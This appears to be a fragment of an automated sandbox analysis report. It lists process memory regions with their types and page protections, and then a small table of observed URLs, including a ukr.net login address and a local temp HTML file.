8952000
|
heap
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
7FF838A10000
|
trusted library allocation
|
page read and write
|
||
|
2D2C000
|
trusted library allocation
|
page read and write
|
||
|
28B2000
|
heap
|
page read and write
|
||
|
7FF8387E6000
|
trusted library allocation
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
E37187D000
|
stack
|
page read and write
|
||
|
74ED000
|
stack
|
page read and write
|
||
|
476E000
|
stack
|
page read and write
|
||
|
2410000
|
heap
|
page read and write
|
||
|
512C000
|
stack
|
page read and write
|
||
|
7FF838960000
|
trusted library allocation
|
page read and write
|
||
|
19DE47B0000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
6447000
|
trusted library allocation
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
289B290F000
|
heap
|
page read and write
|
||
|
289B27F0000
|
heap
|
page read and write
|
||
|
7FF838740000
|
trusted library allocation
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
EAE000
|
heap
|
page read and write
|
||
|
4C7F000
|
stack
|
page read and write
|
||
|
2905000
|
heap
|
page read and write
|
||
|
233ADBD0000
|
trusted library section
|
page read and write
|
||
|
7A3C000
|
heap
|
page read and write
|
||
|
4820000
|
heap
|
page execute and read and write
|
||
|
588B000
|
trusted library allocation
|
page read and write
|
||
|
7C0000
|
trusted library allocation
|
page read and write
|
||
|
7FDF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289B28C9000
|
heap
|
page read and write
|
There are 660 hidden memdumps, click here to show them.
DOM / HTML
|
URL
|
Malicious
|
|
|---|---|---|
|
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
|
||
|
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
|
||
|
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
|
||
|
file:///C:/Users/user/appdata/local/temp/748-929-24.html
|